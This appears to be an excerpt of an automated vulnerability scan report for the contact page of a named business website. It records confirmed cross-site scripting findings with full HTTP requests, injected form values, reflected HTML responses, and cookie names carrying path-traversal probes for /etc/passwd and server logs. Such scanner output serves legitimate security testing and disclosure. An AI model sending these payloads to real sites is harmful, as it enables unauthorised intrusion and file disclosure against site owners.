<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000BBC)</script>" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" formError" /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px 
groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td width="473..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter      Type  Value
button         POST  Submit
captchaString  POST  3
comments       POST  3
company        POST  3
email          POST  netsparker@example.com
firstName      POST  '"--></style></script><script>alert(0x000BE2)</script>
lastName       POST  Smith
leadCategory   POST  3
phone          POST  3
subCategoryId  POST  -1
url            POST  3
value          POST  3
yourInterest   POST  3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 261
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BE2)%3c%2fscript%3e&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:17 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=B8484958ECDCCE6F8812954C60AB1EB3; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000BE2)</script>" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" formError" /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" 
style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <t..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x000BF9)</script>
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
